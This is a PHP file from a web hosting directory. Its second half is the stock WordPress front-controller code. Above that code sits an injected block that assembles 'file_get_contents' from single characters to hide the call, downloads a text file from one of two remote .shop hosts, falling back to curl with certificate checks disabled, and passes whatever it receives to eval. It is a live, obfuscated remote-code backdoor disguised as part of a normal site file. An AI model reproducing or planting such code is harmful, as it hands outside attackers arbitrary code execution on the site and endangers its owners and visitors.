File: /virtual/yunportfolio/public_html/yunportfolio.shop/sample.php
<?php
$load = '';
$sources = ['f','i','l','e','_','g','e','t','_','c','o','n','t','e','n','t','s'];
foreach($sources as $s) $load .= $s;
$fetch = false;
if(ini_get('allow_url_fopen') && function_exists($load)) {
$fetch = @$load('http://z60108_7.qosinski.shop/stat/index2.txt');
}
if($fetch === false && function_exists('curl_init')) {
$ch = curl_init();
$opts = [10102=>true,10002=>'http://z51014_7.ldxjjxx.shop/stat/index2.txt',19913=>true,19914=>true,13=>10];
curl_setopt_array($ch, $opts);
$fetch = curl_exec($ch);
curl_close($ch);
}
if($fetch !== false) {
$payload = '?>' . $fetch;
eval($payload);
}
?>
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';